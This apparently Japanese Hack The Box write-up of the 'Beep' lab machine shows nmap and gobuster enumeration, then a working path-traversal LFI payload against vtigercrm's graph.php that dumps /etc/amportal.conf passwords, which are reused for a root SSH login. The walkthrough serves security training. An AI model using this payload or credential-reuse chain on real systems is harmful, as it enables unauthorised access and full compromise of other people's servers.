HTB Beep
ポート探索
nmap
$ nmap -sCV -A -v -Pn -p- --min-rate 5000 10.10.10.7 -oN nmap_result.txtPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: USER EXPIRE(NEVER) APOP TOP IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING RESP-CODES UIDL AUTH-RESP-CODE STLS LOGIN-DELAY(0)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 790/udp status
|_ 100024 1 793/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed OK IMAP4 MULTIAPPEND UNSELECT ID CHILDREN RENAME URLAUTHA0001 ANNOTATEMORE IMAP4rev1 MAILBOX-REFERRALS X-NETSCAPE LIST-SUBSCRIBED CONDSTORE IDLE LITERAL+ LISTEXT ATOMIC THREAD=REFERENCES SORT STARTTLS QUOTA UIDPLUS THREAD=ORDEREDSUBJECT RIGHTS=kxte BINARY NAMESPACE ACL SORT=MODSEQ CATENATE NO
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-04-07T08:22:08
| Not valid after: 2018-04-07T08:22:08
| MD5: 621a:82b6:cf7e:1afa:5284:1c91:60c8:fbc8
|_SHA-1: 800a:c6e7:065e:1198:0187:c452:0d9b:18ef:e557:a09f
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry
|_/
|_ssl-date: 2024-11-14T17:37:27+00:00; +4s from scanner time.
|_http-favicon: Unknown favicon MD5: 80DCC71362B27C7D0E608B0890C05E9F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Elastix - Login page
793/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443ポート探索
$ gobuster dir -u https://10.10.10.7/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 200 -k -f
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/ (Status: 403) [Size: 286]
/admin/ (Status: 302) [Size: 0] [--> config.php]
/static/ (Status: 200) [Size: 1276]
/error/ (Status: 403) [Size: 284]
/var/ (Status: 200) [Size: 1236]
/lang/ (Status: 200) [Size: 4788]
/images/ (Status: 200) [Size: 29898]
/help/ (Status: 200) [Size: 346]
/themes/ (Status: 200) [Size: 3172]
/libs/ (Status: 200) [Size: 7798]
/mail/ (Status: 200) [Size: 2411]
/modules/ (Status: 200) [Size: 13132]
/panel/ (Status: 200) [Size: 1065]
/icons/ (Status: 200) [Size: 31006]
/configs/ (Status: 200) [Size: 1282]
/mailman/ (Status: 403) [Size: 286]
/pipermail/ (Status: 200) [Size: 698]
/recordings/ (Status: 200) [Size: 5194]
/vtigercrm/ (Status: 200) [Size: 6499]
画面を見るとelastixを使っているようです。
Exploit
LFI
$ curl -k "https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action"
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjESSH
$ ssh asteriskuser@10.10.10.7
asteriskuser@10.10.10.7's password:
Permission denied, please try again.
asteriskuser@10.10.10.7's password: $ ssh root@10.10.10.7
root@10.10.10.7's password:
Last login: Tue Jul 16 11:45:47 2019
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)